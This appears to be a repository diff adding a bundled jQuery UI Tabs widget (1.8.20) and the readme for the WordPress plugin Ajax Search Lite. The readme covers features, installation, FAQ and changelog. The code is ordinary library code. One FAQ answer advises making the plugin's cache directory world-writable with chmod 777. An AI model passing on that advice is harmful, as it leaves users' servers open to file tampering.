10861 |
+
});
|
10862 |
+
|
10863 |
+
// initialization from scratch
|
10864 |
+
if ( init ) {
|
10865 |
+
// attach necessary classes for styling
|
10866 |
+
this.element.addClass( "ui-tabs ui-widget ui-widget-content ui-corner-all" );
|
10867 |
+
this.list.addClass( "ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all" );
|
10868 |
+
this.lis.addClass( "ui-state-default ui-corner-top" );
|
10869 |
+
this.panels.addClass( "ui-tabs-panel ui-widget-content ui-corner-bottom" );
|
10870 |
+
|
10871 |
+
// Selected tab
|
10872 |
+
// use "selected" option or try to retrieve:
|
10873 |
+
// 1. from fragment identifier in url
|
10874 |
+
// 2. from cookie
|
10875 |
+
// 3. from selected class attribute on <li>
|
10876 |
+
if ( o.selected === undefined ) {
|
10877 |
+
if ( location.hash ) {
|
10878 |
+
this.anchors.each(function( i, a ) {
|
10879 |
+
if ( a.hash == location.hash ) {
|
10880 |
+
o.selected = i;
|
10881 |
+
return false;
|
10882 |
+
}
|
10883 |
+
});
|
10884 |
+
}
|
10885 |
+
if ( typeof o.selected !== "number" && o.cookie ) {
|
10886 |
+
o.selected = parseInt( self._cookie(), 10 );
|
10887 |
+
}
|
10888 |
+
if ( typeof o.selected !== "number" && this.lis.filter( ".ui-tabs-selected" ).length ) {
|
10889 |
+
o.selected = this.lis.index( this.lis.filter( ".ui-tabs-selected" ) );
|
10890 |
+
}
|
10891 |
+
o.selected = o.selected || ( this.lis.length ? 0 : -1 );
|
10892 |
+
} else if ( o.selected === null ) { // usage of null is deprecated, TODO remove in next release
|
10893 |
+
o.selected = -1;
|
10894 |
+
}
|
10895 |
+
|
10896 |
+
// sanity check - default to first tab...
|
10897 |
+
o.selected = ( ( o.selected >= 0 && this.anchors[ o.selected ] ) || o.selected < 0 )
|
10898 |
+
? o.selected
|
10899 |
+
: 0;
|
10900 |
+
|
10901 |
+
// Take disabling tabs via class attribute from HTML
|
10902 |
+
// into account and update option properly.
|
10903 |
+
// A selected tab cannot become disabled.
|
10904 |
+
o.disabled = $.unique( o.disabled.concat(
|
10905 |
+
$.map( this.lis.filter( ".ui-state-disabled" ), function( n, i ) {
|
10906 |
+
return self.lis.index( n );
|
10907 |
+
})
|
10908 |
+
) ).sort();
|
10909 |
+
|
10910 |
+
if ( $.inArray( o.selected, o.disabled ) != -1 ) {
|
10911 |
+
o.disabled.splice( $.inArray( o.selected, o.disabled ), 1 );
|
10912 |
+
}
|
10913 |
+
|
10914 |
+
// highlight selected tab
|
10915 |
+
this.panels.addClass( "ui-tabs-hide" );
|
10916 |
+
this.lis.removeClass( "ui-tabs-selected ui-state-active" );
|
10917 |
+
// check for length avoids error when initializing empty list
|
10918 |
+
if ( o.selected >= 0 && this.anchors.length ) {
|
10919 |
+
self.element.find( self._sanitizeSelector( self.anchors[ o.selected ].hash ) ).removeClass( "ui-tabs-hide" );
|
10920 |
+
this.lis.eq( o.selected ).addClass( "ui-tabs-selected ui-state-active" );
|
10921 |
+
|
10922 |
+
// seems to be expected behavior that the show callback is fired
|
10923 |
+
self.element.queue( "tabs", function() {
|
10924 |
+
self._trigger( "show", null,
|
10925 |
+
self._ui( self.anchors[ o.selected ], self.element.find( self._sanitizeSelector( self.anchors[ o.selected ].hash ) )[ 0 ] ) );
|
10926 |
+
});
|
10927 |
+
|
10928 |
+
this.load( o.selected );
|
10929 |
+
}
|
10930 |
+
|
10931 |
+
// clean up to avoid memory leaks in certain versions of IE 6
|
10932 |
+
// TODO: namespace this event
|
10933 |
+
$( window ).bind( "unload", function() {
|
10934 |
+
self.lis.add( self.anchors ).unbind( ".tabs" );
|
10935 |
+
self.lis = self.anchors = self.panels = null;
|
10936 |
+
});
|
10937 |
+
// update selected after add/remove
|
10938 |
+
} else {
|
10939 |
+
o.selected = this.lis.index( this.lis.filter( ".ui-tabs-selected" ) );
|
10940 |
+
}
|
10941 |
+
|
10942 |
+
// update collapsible
|
10943 |
+
// TODO: use .toggleClass()
|
10944 |
+
this.element[ o.collapsible ? "addClass" : "removeClass" ]( "ui-tabs-collapsible" );
|
10945 |
+
|
10946 |
+
// set or update cookie after init and add/remove respectively
|
10947 |
+
if ( o.cookie ) {
|
10948 |
+
this._cookie( o.selected, o.cookie );
|
10949 |
+
}
|
10950 |
+
|
10951 |
+
// disable tabs
|
10952 |
+
for ( var i = 0, li; ( li = this.lis[ i ] ); i++ ) {
|
10953 |
+
$( li )[ $.inArray( i, o.disabled ) != -1 &&
|
10954 |
+
// TODO: use .toggleClass()
|
10955 |
+
!$( li ).hasClass( "ui-tabs-selected" ) ? "addClass" : "removeClass" ]( "ui-state-disabled" );
|
10956 |
+
}
|
10957 |
+
|
10958 |
+
// reset cache if switching from cached to not cached
|
10959 |
+
if ( o.cache === false ) {
|
10960 |
+
this.anchors.removeData( "cache.tabs" );
|
10961 |
+
}
|
10962 |
+
|
10963 |
+
// remove all handlers before, tabify may run on existing tabs after add or option change
|
10964 |
+
this.lis.add( this.anchors ).unbind( ".tabs" );
|
10965 |
+
|
10966 |
+
if ( o.event !== "mouseover" ) {
|
10967 |
+
var addState = function( state, el ) {
|
10968 |
+
if ( el.is( ":not(.ui-state-disabled)" ) ) {
|
10969 |
+
el.addClass( "ui-state-" + state );
|
10970 |
+
}
|
10971 |
+
};
|
10972 |
+
var removeState = function( state, el ) {
|
10973 |
+
el.removeClass( "ui-state-" + state );
|
10974 |
+
};
|
10975 |
+
this.lis.bind( "mouseover.tabs" , function() {
|
10976 |
+
addState( "hover", $( this ) );
|
10977 |
+
});
|
10978 |
+
this.lis.bind( "mouseout.tabs", function() {
|
10979 |
+
removeState( "hover", $( this ) );
|
10980 |
+
});
|
10981 |
+
this.anchors.bind( "focus.tabs", function() {
|
10982 |
+
addState( "focus", $( this ).closest( "li" ) );
|
10983 |
+
});
|
10984 |
+
this.anchors.bind( "blur.tabs", function() {
|
10985 |
+
removeState( "focus", $( this ).closest( "li" ) );
|
10986 |
+
});
|
10987 |
+
}
|
10988 |
+
|
10989 |
+
// set up animations
|
10990 |
+
var hideFx, showFx;
|
10991 |
+
if ( o.fx ) {
|
10992 |
+
if ( $.isArray( o.fx ) ) {
|
10993 |
+
hideFx = o.fx[ 0 ];
|
10994 |
+
showFx = o.fx[ 1 ];
|
10995 |
+
} else {
|
10996 |
+
hideFx = showFx = o.fx;
|
10997 |
+
}
|
10998 |
+
}
|
10999 |
+
|
11000 |
+
// Reset certain styles left over from animation
|
11001 |
+
// and prevent IE's ClearType bug...
|
11002 |
+
function resetStyle( $el, fx ) {
|
11003 |
+
$el.css( "display", "" );
|
11004 |
+
if ( !$.support.opacity && fx.opacity ) {
|
11005 |
+
$el[ 0 ].style.removeAttribute( "filter" );
|
11006 |
+
}
|
11007 |
+
}
|
11008 |
+
|
11009 |
+
// Show a tab...
|
11010 |
+
var showTab = showFx
|
11011 |
+
? function( clicked, $show ) {
|
11012 |
+
$( clicked ).closest( "li" ).addClass( "ui-tabs-selected ui-state-active" );
|
11013 |
+
$show.hide().removeClass( "ui-tabs-hide" ) // avoid flicker that way
|
11014 |
+
.animate( showFx, showFx.duration || "normal", function() {
|
11015 |
+
resetStyle( $show, showFx );
|
11016 |
+
self._trigger( "show", null, self._ui( clicked, $show[ 0 ] ) );
|
11017 |
+
});
|
11018 |
+
}
|
11019 |
+
: function( clicked, $show ) {
|
11020 |
+
$( clicked ).closest( "li" ).addClass( "ui-tabs-selected ui-state-active" );
|
11021 |
+
$show.removeClass( "ui-tabs-hide" );
|
11022 |
+
self._trigger( "show", null, self._ui( clicked, $show[ 0 ] ) );
|
11023 |
+
};
|
11024 |
+
|
11025 |
+
// Hide a tab, $show is optional...
|
11026 |
+
var hideTab = hideFx
|
11027 |
+
? function( clicked, $hide ) {
|
11028 |
+
$hide.animate( hideFx, hideFx.duration || "normal", function() {
|
11029 |
+
self.lis.removeClass( "ui-tabs-selected ui-state-active" );
|
11030 |
+
$hide.addClass( "ui-tabs-hide" );
|
11031 |
+
resetStyle( $hide, hideFx );
|
11032 |
+
self.element.dequeue( "tabs" );
|
11033 |
+
});
|
11034 |
+
}
|
11035 |
+
: function( clicked, $hide, $show ) {
|
11036 |
+
self.lis.removeClass( "ui-tabs-selected ui-state-active" );
|
11037 |
+
$hide.addClass( "ui-tabs-hide" );
|
11038 |
+
self.element.dequeue( "tabs" );
|
11039 |
+
};
|
11040 |
+
|
11041 |
+
// attach tab event handler, unbind to avoid duplicates from former tabifying...
|
11042 |
+
this.anchors.bind( o.event + ".tabs", function() {
|
11043 |
+
var el = this,
|
11044 |
+
$li = $(el).closest( "li" ),
|
11045 |
+
$hide = self.panels.filter( ":not(.ui-tabs-hide)" ),
|
11046 |
+
$show = self.element.find( self._sanitizeSelector( el.hash ) );
|
11047 |
+
|
11048 |
+
// If tab is already selected and not collapsible or tab disabled or
|
11049 |
+
// or is already loading or click callback returns false stop here.
|
11050 |
+
// Check if click handler returns false last so that it is not executed
|
11051 |
+
// for a disabled or loading tab!
|
11052 |
+
if ( ( $li.hasClass( "ui-tabs-selected" ) && !o.collapsible) ||
|
11053 |
+
$li.hasClass( "ui-state-disabled" ) ||
|
11054 |
+
$li.hasClass( "ui-state-processing" ) ||
|
11055 |
+
self.panels.filter( ":animated" ).length ||
|
11056 |
+
self._trigger( "select", null, self._ui( this, $show[ 0 ] ) ) === false ) {
|
11057 |
+
this.blur();
|
11058 |
+
return false;
|
11059 |
+
}
|
11060 |
+
|
11061 |
+
o.selected = self.anchors.index( this );
|
11062 |
+
|
11063 |
+
self.abort();
|
11064 |
+
|
11065 |
+
// if tab may be closed
|
11066 |
+
if ( o.collapsible ) {
|
11067 |
+
if ( $li.hasClass( "ui-tabs-selected" ) ) {
|
11068 |
+
o.selected = -1;
|
11069 |
+
|
11070 |
+
if ( o.cookie ) {
|
11071 |
+
self._cookie( o.selected, o.cookie );
|
11072 |
+
}
|
11073 |
+
|
11074 |
+
self.element.queue( "tabs", function() {
|
11075 |
+
hideTab( el, $hide );
|
11076 |
+
}).dequeue( "tabs" );
|
11077 |
+
|
11078 |
+
this.blur();
|
11079 |
+
return false;
|
11080 |
+
} else if ( !$hide.length ) {
|
11081 |
+
if ( o.cookie ) {
|
11082 |
+
self._cookie( o.selected, o.cookie );
|
11083 |
+
}
|
11084 |
+
|
11085 |
+
self.element.queue( "tabs", function() {
|
11086 |
+
showTab( el, $show );
|
11087 |
+
});
|
11088 |
+
|
11089 |
+
// TODO make passing in node possible, see also http://dev.jqueryui.com/ticket/3171
|
11090 |
+
self.load( self.anchors.index( this ) );
|
11091 |
+
|
11092 |
+
this.blur();
|
11093 |
+
return false;
|
11094 |
+
}
|
11095 |
+
}
|
11096 |
+
|
11097 |
+
if ( o.cookie ) {
|
11098 |
+
self._cookie( o.selected, o.cookie );
|
11099 |
+
}
|
11100 |
+
|
11101 |
+
// show new tab
|
11102 |
+
if ( $show.length ) {
|
11103 |
+
if ( $hide.length ) {
|
11104 |
+
self.element.queue( "tabs", function() {
|
11105 |
+
hideTab( el, $hide );
|
11106 |
+
});
|
11107 |
+
}
|
11108 |
+
self.element.queue( "tabs", function() {
|
11109 |
+
showTab( el, $show );
|
11110 |
+
});
|
11111 |
+
|
11112 |
+
self.load( self.anchors.index( this ) );
|
11113 |
+
} else {
|
11114 |
+
throw "jQuery UI Tabs: Mismatching fragment identifier.";
|
11115 |
+
}
|
11116 |
+
|
11117 |
+
// Prevent IE from keeping other link focussed when using the back button
|
11118 |
+
// and remove dotted border from clicked link. This is controlled via CSS
|
11119 |
+
// in modern browsers; blur() removes focus from address bar in Firefox
|
11120 |
+
// which can become a usability and annoying problem with tabs('rotate').
|
11121 |
+
if ( $.browser.msie ) {
|
11122 |
+
this.blur();
|
11123 |
+
}
|
11124 |
+
});
|
11125 |
+
|
11126 |
+
// disable click in any case
|
11127 |
+
this.anchors.bind( "click.tabs", function(){
|
11128 |
+
return false;
|
11129 |
+
});
|
11130 |
+
},
|
11131 |
+
|
11132 |
+
_getIndex: function( index ) {
|
11133 |
+
// meta-function to give users option to provide a href string instead of a numerical index.
|
11134 |
+
// also sanitizes numerical indexes to valid values.
|
11135 |
+
if ( typeof index == "string" ) {
|
11136 |
+
index = this.anchors.index( this.anchors.filter( "[href$='" + index + "']" ) );
|
11137 |
+
}
|
11138 |
+
|
11139 |
+
return index;
|
11140 |
+
},
|
11141 |
+
|
11142 |
+
destroy: function() {
|
11143 |
+
var o = this.options;
|
11144 |
+
|
11145 |
+
this.abort();
|
11146 |
+
|
11147 |
+
this.element
|
11148 |
+
.unbind( ".tabs" )
|
11149 |
+
.removeClass( "ui-tabs ui-widget ui-widget-content ui-corner-all ui-tabs-collapsible" )
|
11150 |
+
.removeData( "tabs" );
|
11151 |
+
|
11152 |
+
this.list.removeClass( "ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all" );
|
11153 |
+
|
11154 |
+
this.anchors.each(function() {
|
11155 |
+
var href = $.data( this, "href.tabs" );
|
11156 |
+
if ( href ) {
|
11157 |
+
this.href = href;
|
11158 |
+
}
|
11159 |
+
var $this = $( this ).unbind( ".tabs" );
|
11160 |
+
$.each( [ "href", "load", "cache" ], function( i, prefix ) {
|
11161 |
+
$this.removeData( prefix + ".tabs" );
|
11162 |
+
});
|
11163 |
+
});
|
11164 |
+
|
11165 |
+
this.lis.unbind( ".tabs" ).add( this.panels ).each(function() {
|
11166 |
+
if ( $.data( this, "destroy.tabs" ) ) {
|
11167 |
+
$( this ).remove();
|
11168 |
+
} else {
|
11169 |
+
$( this ).removeClass([
|
11170 |
+
"ui-state-default",
|
11171 |
+
"ui-corner-top",
|
11172 |
+
"ui-tabs-selected",
|
11173 |
+
"ui-state-active",
|
11174 |
+
"ui-state-hover",
|
11175 |
+
"ui-state-focus",
|
11176 |
+
"ui-state-disabled",
|
11177 |
+
"ui-tabs-panel",
|
11178 |
+
"ui-widget-content",
|
11179 |
+
"ui-corner-bottom",
|
11180 |
+
"ui-tabs-hide"
|
11181 |
+
].join( " " ) );
|
11182 |
+
}
|
11183 |
+
});
|
11184 |
+
|
11185 |
+
if ( o.cookie ) {
|
11186 |
+
this._cookie( null, o.cookie );
|
11187 |
+
}
|
11188 |
+
|
11189 |
+
return this;
|
11190 |
+
},
|
11191 |
+
|
11192 |
+
add: function( url, label, index ) {
|
11193 |
+
if ( index === undefined ) {
|
11194 |
+
index = this.anchors.length;
|
11195 |
+
}
|
11196 |
+
|
11197 |
+
var self = this,
|
11198 |
+
o = this.options,
|
11199 |
+
$li = $( o.tabTemplate.replace( /#\{href\}/g, url ).replace( /#\{label\}/g, label ) ),
|
11200 |
+
id = !url.indexOf( "#" ) ? url.replace( "#", "" ) : this._tabId( $( "a", $li )[ 0 ] );
|
11201 |
+
|
11202 |
+
$li.addClass( "ui-state-default ui-corner-top" ).data( "destroy.tabs", true );
|
11203 |
+
|
11204 |
+
// try to find an existing element before creating a new one
|
11205 |
+
var $panel = self.element.find( "#" + id );
|
11206 |
+
if ( !$panel.length ) {
|
11207 |
+
$panel = $( o.panelTemplate )
|
11208 |
+
.attr( "id", id )
|
11209 |
+
.data( "destroy.tabs", true );
|
11210 |
+
}
|
11211 |
+
$panel.addClass( "ui-tabs-panel ui-widget-content ui-corner-bottom ui-tabs-hide" );
|
11212 |
+
|
11213 |
+
if ( index >= this.lis.length ) {
|
11214 |
+
$li.appendTo( this.list );
|
11215 |
+
$panel.appendTo( this.list[ 0 ].parentNode );
|
11216 |
+
} else {
|
11217 |
+
$li.insertBefore( this.lis[ index ] );
|
11218 |
+
$panel.insertBefore( this.panels[ index ] );
|
11219 |
+
}
|
11220 |
+
|
11221 |
+
o.disabled = $.map( o.disabled, function( n, i ) {
|
11222 |
+
return n >= index ? ++n : n;
|
11223 |
+
});
|
11224 |
+
|
11225 |
+
this._tabify();
|
11226 |
+
|
11227 |
+
if ( this.anchors.length == 1 ) {
|
11228 |
+
o.selected = 0;
|
11229 |
+
$li.addClass( "ui-tabs-selected ui-state-active" );
|
11230 |
+
$panel.removeClass( "ui-tabs-hide" );
|
11231 |
+
this.element.queue( "tabs", function() {
|
11232 |
+
self._trigger( "show", null, self._ui( self.anchors[ 0 ], self.panels[ 0 ] ) );
|
11233 |
+
});
|
11234 |
+
|
11235 |
+
this.load( 0 );
|
11236 |
+
}
|
11237 |
+
|
11238 |
+
this._trigger( "add", null, this._ui( this.anchors[ index ], this.panels[ index ] ) );
|
11239 |
+
return this;
|
11240 |
+
},
|
11241 |
+
|
11242 |
+
remove: function( index ) {
|
11243 |
+
index = this._getIndex( index );
|
11244 |
+
var o = this.options,
|
11245 |
+
$li = this.lis.eq( index ).remove(),
|
11246 |
+
$panel = this.panels.eq( index ).remove();
|
11247 |
+
|
11248 |
+
// If selected tab was removed focus tab to the right or
|
11249 |
+
// in case the last tab was removed the tab to the left.
|
11250 |
+
if ( $li.hasClass( "ui-tabs-selected" ) && this.anchors.length > 1) {
|
11251 |
+
this.select( index + ( index + 1 < this.anchors.length ? 1 : -1 ) );
|
11252 |
+
}
|
11253 |
+
|
11254 |
+
o.disabled = $.map(
|
11255 |
+
$.grep( o.disabled, function(n, i) {
|
11256 |
+
return n != index;
|
11257 |
+
}),
|
11258 |
+
function( n, i ) {
|
11259 |
+
return n >= index ? --n : n;
|
11260 |
+
});
|
11261 |
+
|
11262 |
+
this._tabify();
|
11263 |
+
|
11264 |
+
this._trigger( "remove", null, this._ui( $li.find( "a" )[ 0 ], $panel[ 0 ] ) );
|
11265 |
+
return this;
|
11266 |
+
},
|
11267 |
+
|
11268 |
+
enable: function( index ) {
|
11269 |
+
index = this._getIndex( index );
|
11270 |
+
var o = this.options;
|
11271 |
+
if ( $.inArray( index, o.disabled ) == -1 ) {
|
11272 |
+
return;
|
11273 |
+
}
|
11274 |
+
|
11275 |
+
this.lis.eq( index ).removeClass( "ui-state-disabled" );
|
11276 |
+
o.disabled = $.grep( o.disabled, function( n, i ) {
|
11277 |
+
return n != index;
|
11278 |
+
});
|
11279 |
+
|
11280 |
+
this._trigger( "enable", null, this._ui( this.anchors[ index ], this.panels[ index ] ) );
|
11281 |
+
return this;
|
11282 |
+
},
|
11283 |
+
|
11284 |
+
disable: function( index ) {
|
11285 |
+
index = this._getIndex( index );
|
11286 |
+
var self = this, o = this.options;
|
11287 |
+
// cannot disable already selected tab
|
11288 |
+
if ( index != o.selected ) {
|
11289 |
+
this.lis.eq( index ).addClass( "ui-state-disabled" );
|
11290 |
+
|
11291 |
+
o.disabled.push( index );
|
11292 |
+
o.disabled.sort();
|
11293 |
+
|
11294 |
+
this._trigger( "disable", null, this._ui( this.anchors[ index ], this.panels[ index ] ) );
|
11295 |
+
}
|
11296 |
+
|
11297 |
+
return this;
|
11298 |
+
},
|
11299 |
+
|
11300 |
+
select: function( index ) {
|
11301 |
+
index = this._getIndex( index );
|
11302 |
+
if ( index == -1 ) {
|
11303 |
+
if ( this.options.collapsible && this.options.selected != -1 ) {
|
11304 |
+
index = this.options.selected;
|
11305 |
+
} else {
|
11306 |
+
return this;
|
11307 |
+
}
|
11308 |
+
}
|
11309 |
+
this.anchors.eq( index ).trigger( this.options.event + ".tabs" );
|
11310 |
+
return this;
|
11311 |
+
},
|
11312 |
+
|
11313 |
+
load: function( index ) {
|
11314 |
+
index = this._getIndex( index );
|
11315 |
+
var self = this,
|
11316 |
+
o = this.options,
|
11317 |
+
a = this.anchors.eq( index )[ 0 ],
|
11318 |
+
url = $.data( a, "load.tabs" );
|
11319 |
+
|
11320 |
+
this.abort();
|
11321 |
+
|
11322 |
+
// not remote or from cache
|
11323 |
+
if ( !url || this.element.queue( "tabs" ).length !== 0 && $.data( a, "cache.tabs" ) ) {
|
11324 |
+
this.element.dequeue( "tabs" );
|
11325 |
+
return;
|
11326 |
+
}
|
11327 |
+
|
11328 |
+
// load remote from here on
|
11329 |
+
this.lis.eq( index ).addClass( "ui-state-processing" );
|
11330 |
+
|
11331 |
+
if ( o.spinner ) {
|
11332 |
+
var span = $( "span", a );
|
11333 |
+
span.data( "label.tabs", span.html() ).html( o.spinner );
|
11334 |
+
}
|
11335 |
+
|
11336 |
+
this.xhr = $.ajax( $.extend( {}, o.ajaxOptions, {
|
11337 |
+
url: url,
|
11338 |
+
success: function( r, s ) {
|
11339 |
+
self.element.find( self._sanitizeSelector( a.hash ) ).html( r );
|
11340 |
+
|
11341 |
+
// take care of tab labels
|
11342 |
+
self._cleanup();
|
11343 |
+
|
11344 |
+
if ( o.cache ) {
|
11345 |
+
$.data( a, "cache.tabs", true );
|
11346 |
+
}
|
11347 |
+
|
11348 |
+
self._trigger( "load", null, self._ui( self.anchors[ index ], self.panels[ index ] ) );
|
11349 |
+
try {
|
11350 |
+
o.ajaxOptions.success( r, s );
|
11351 |
+
}
|
11352 |
+
catch ( e ) {}
|
11353 |
+
},
|
11354 |
+
error: function( xhr, s, e ) {
|
11355 |
+
// take care of tab labels
|
11356 |
+
self._cleanup();
|
11357 |
+
|
11358 |
+
self._trigger( "load", null, self._ui( self.anchors[ index ], self.panels[ index ] ) );
|
11359 |
+
try {
|
11360 |
+
// Passing index avoid a race condition when this method is
|
11361 |
+
// called after the user has selected another tab.
|
11362 |
+
// Pass the anchor that initiated this request allows
|
11363 |
+
// loadError to manipulate the tab content panel via $(a.hash)
|
11364 |
+
o.ajaxOptions.error( xhr, s, index, a );
|
11365 |
+
}
|
11366 |
+
catch ( e ) {}
|
11367 |
+
}
|
11368 |
+
} ) );
|
11369 |
+
|
11370 |
+
// last, so that load event is fired before show...
|
11371 |
+
self.element.dequeue( "tabs" );
|
11372 |
+
|
11373 |
+
return this;
|
11374 |
+
},
|
11375 |
+
|
11376 |
+
abort: function() {
|
11377 |
+
// stop possibly running animations
|
11378 |
+
this.element.queue( [] );
|
11379 |
+
this.panels.stop( false, true );
|
11380 |
+
|
11381 |
+
// "tabs" queue must not contain more than two elements,
|
11382 |
+
// which are the callbacks for the latest clicked tab...
|
11383 |
+
this.element.queue( "tabs", this.element.queue( "tabs" ).splice( -2, 2 ) );
|
11384 |
+
|
11385 |
+
// terminate pending requests from other tabs
|
11386 |
+
if ( this.xhr ) {
|
11387 |
+
this.xhr.abort();
|
11388 |
+
delete this.xhr;
|
11389 |
+
}
|
11390 |
+
|
11391 |
+
// take care of tab labels
|
11392 |
+
this._cleanup();
|
11393 |
+
return this;
|
11394 |
+
},
|
11395 |
+
|
11396 |
+
url: function( index, url ) {
|
11397 |
+
this.anchors.eq( index ).removeData( "cache.tabs" ).data( "load.tabs", url );
|
11398 |
+
return this;
|
11399 |
+
},
|
11400 |
+
|
11401 |
+
length: function() {
|
11402 |
+
return this.anchors.length;
|
11403 |
+
}
|
11404 |
+
});
|
11405 |
+
|
11406 |
+
$.extend( $.ui.tabs, {
|
11407 |
+
version: "1.8.20"
|
11408 |
+
});
|
11409 |
+
|
11410 |
+
/*
|
11411 |
+
* Tabs Extensions
|
11412 |
+
*/
|
11413 |
+
|
11414 |
+
/*
|
11415 |
+
* Rotate
|
11416 |
+
*/
|
11417 |
+
$.extend( $.ui.tabs.prototype, {
|
11418 |
+
rotation: null,
|
11419 |
+
rotate: function( ms, continuing ) {
|
11420 |
+
var self = this,
|
11421 |
+
o = this.options;
|
11422 |
+
|
11423 |
+
var rotate = self._rotate || ( self._rotate = function( e ) {
|
11424 |
+
clearTimeout( self.rotation );
|
11425 |
+
self.rotation = setTimeout(function() {
|
11426 |
+
var t = o.selected;
|
11427 |
+
self.select( ++t < self.anchors.length ? t : 0 );
|
11428 |
+
}, ms );
|
11429 |
+
|
11430 |
+
if ( e ) {
|
11431 |
+
e.stopPropagation();
|
11432 |
+
}
|
11433 |
+
});
|
11434 |
+
|
11435 |
+
var stop = self._unrotate || ( self._unrotate = !continuing
|
11436 |
+
? function(e) {
|
11437 |
+
if (e.clientX) { // in case of a true click
|
11438 |
+
self.rotate(null);
|
11439 |
+
}
|
11440 |
+
}
|
11441 |
+
: function( e ) {
|
11442 |
+
rotate();
|
11443 |
+
});
|
11444 |
+
|
11445 |
+
// start rotation
|
11446 |
+
if ( ms ) {
|
11447 |
+
this.element.bind( "tabsshow", rotate );
|
11448 |
+
this.anchors.bind( o.event + ".tabs", stop );
|
11449 |
+
rotate();
|
11450 |
+
// stop rotation
|
11451 |
+
} else {
|
11452 |
+
clearTimeout( self.rotation );
|
11453 |
+
this.element.unbind( "tabsshow", rotate );
|
11454 |
+
this.anchors.unbind( o.event + ".tabs", stop );
|
11455 |
+
delete this._rotate;
|
11456 |
+
delete this._unrotate;
|
11457 |
+
}
|
11458 |
+
|
11459 |
+
return this;
|
11460 |
+
}
|
11461 |
+
});
|
11462 |
+
})(asljQuery);
|
readme.txt
ADDED
@@ -0,0 +1,114 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
=== Ajax Search Lite ===
|
2 |
+
Contributors: wpdreams
|
3 |
+
Donate link: http://wp-dreams.com
|
4 |
+
Tags: search, better wordpress search, better search plugin, ajax search, better search, wp search, wp search plugin, relevant search plugin, search plugin, wordpress search, advanced search, best wordpress search, ajax wordpress search, ajax search pro
|
5 |
+
Requires at least: 3.3
|
6 |
+
Tested up to: 3.5
|
7 |
+
Stable tag: 1.4
|
8 |
+
License: GPLv2 or later
|
9 |
+
License URI: http://www.gnu.org/licenses/gpl-2.0.html
|
10 |
+
|
11 |
+
A powerful ajax search engine for WordPress.
|
12 |
+
|
13 |
+
== Description ==
|
14 |
+
|
15 |
+
A resonsive search engine, which will boost your user experience by providing a user friendly ajax powered search form. Very smooth animations with mobile device support.
|
16 |
+
Boost the user experience by providing a powerful ajax search plugin to your visitors. It will rock!
|
17 |
+
|
18 |
+
Demo: http://wp-dreams.com/ajax-search-lite/
|
19 |
+
|
20 |
+
Like us on facebook: https://www.facebook.com/pages/WPDreams/383702515034741
|
21 |
+
|
22 |
+
**Features List:**
|
23 |
+
|
24 |
+
* Search in posts and pages
|
25 |
+
* Frontend search settings boxes
|
26 |
+
* Images in search results
|
27 |
+
* Fully ajax powered
|
28 |
+
* Uses custom built jQuery for maximum compatibility
|
29 |
+
* Caches images for faster response time
|
30 |
+
|
31 |
+
Homepage: [wp-dreams.com](http://wp-dreams.com)
|
32 |
+
|
33 |
+
Pro version Demo: [Ajax Search Pro](http://wp-dreams.com/demo/wp-ajaxsearchpro)
|
34 |
+
|
35 |
+
**New In pro version 1.8 (2013.05.10):**
|
36 |
+
|
37 |
+
* Demo: [Ajax Search Pro](http://wp-dreams.com/demo/wp-ajaxsearchpro)
|
38 |
+
* Search in BuddyPress, BBPress, JigoShop, Woocommerce
|
39 |
+
* qTranslate ready
|
40 |
+
* Search result grouping by categories or post types
|
41 |
+
* Search in any custom post types
|
42 |
+
* Responsive design
|
43 |
+
* Search in custom fields
|
44 |
+
* Advanced caching technology - image precaching, search phrase caching
|
45 |
+
* Category selectors on the frontend – It’s now possible to filter the posts by categories
|
46 |
+
* Post grouping by category or post type!
|
47 |
+
* Search in comments
|
48 |
+
* 65+ Themes - Fully configurable and editable, INFINITE variations!
|
49 |
+
* 100+ Admin options
|
50 |
+
|
51 |
+
== Installation ==
|
52 |
+
|
53 |
+
1. Upload `ajax-search-lite` to the `/wp-content/plugins/` directory
|
54 |
+
2. Activate the plugin through the 'Plugins' menu in WordPress
|
55 |
+
3. Place the shortcode from the settings into your template or post-page
|
56 |
+
|
57 |
+
== Frequently asked questions ==
|
58 |
+
|
59 |
+
= The images are not showing, what is wrong? =
|
60 |
+
|
61 |
+
The search parses the first image from the post/page content. Most likely there
|
62 |
+
is no image in post.
|
63 |
+
|
64 |
+
= I added images to the post/page but I still cannot see them =
|
65 |
+
|
66 |
+
Try to chmod to 777 the wp-content/plugins/ajax-search-lite/cache/ directory! All
|
67 |
+
the image files will be stored there.
|
68 |
+
Also, make sure, that the "furl open wrapper" is enabled on your server! In some cases
|
69 |
+
this feature is disabled and you need to contact the server administrator to enable it for you.
|
70 |
+
|
71 |
+
= When I type in something, the search wheel is spinning, but nothing happens =
|
72 |
+
|
73 |
+
It is most likely, that another plugin or the template is throwing errors while the
|
74 |
+
ajax request is generated. Disabling all the plugins one by one can help you rule out which plugin
|
75 |
+
is creating the issue.
|
76 |
+
|
77 |
+
= I disabled all the plugins but the search wheel is still spinning to infinity, nothing happens =
|
78 |
+
|
79 |
+
You should contact me on the support forum with your website url. I will check your website
|
80 |
+
and will let you know what to do.
|
81 |
+
|
82 |
+
|
83 |
+
== Screenshots ==
|
84 |
+
|
85 |
+
1. Ajax Search Lite in action - 2 themes
|
86 |
+
2. Administrator area - nice and smooth
|
87 |
+
|
88 |
+
== Changelog ==
|
89 |
+
|
90 |
+
= 1.4 =
|
91 |
+
* Security fix
|
92 |
+
|
93 |
+
= 1.3 =
|
94 |
+
* 2 brand new themes!
|
95 |
+
* Very stable custom built javascript
|
96 |
+
* Stabilised frontend and backend
|
